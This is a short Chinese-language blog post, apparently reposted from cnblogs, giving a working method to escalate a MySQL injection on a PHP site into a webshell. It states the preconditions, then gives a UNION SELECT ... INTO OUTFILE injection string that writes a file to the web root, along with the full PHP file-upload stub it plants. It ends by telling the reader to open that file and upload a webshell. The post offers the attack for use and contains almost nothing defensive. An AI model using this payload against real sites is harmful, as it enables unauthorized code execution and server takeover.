zoukankan      html  css  js  c++  java
  • 关于MySQL注入漏洞到获取webshell

    关于PHP网站报错性注入拿shell的方法,定位到报错在某个字段上的利用方式:

    条件1: 爆出了网站的物理路径

    条件2:MySQL具有into outfile权限

    SQL语句为:

    假如字段为2:

    union+select+1,payload的十六进制,3,4,5+into+outfile+'/var/www/html/data/1.php';

    payload:

    <?php echo 'Uploader<br>';echo '<br>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload !!!</b><br><br>'; }else { echo '<b>Upload !!!</b><br><br>'; }}?>

    访问1.PHP上传webshell即可。

  • 相关阅读:
    Java第一课
    bootstrap之google fonts
    bootstrap之clearfix
    Leetcode题解
    python图片爬虫
    [python / selenium]
    使用python
    python
    python
    python爬虫入门新手向实战
  • 原文地址:https://www.cnblogs.com/hack404/p/11947682.html
Copyright © 2011-2022 走看看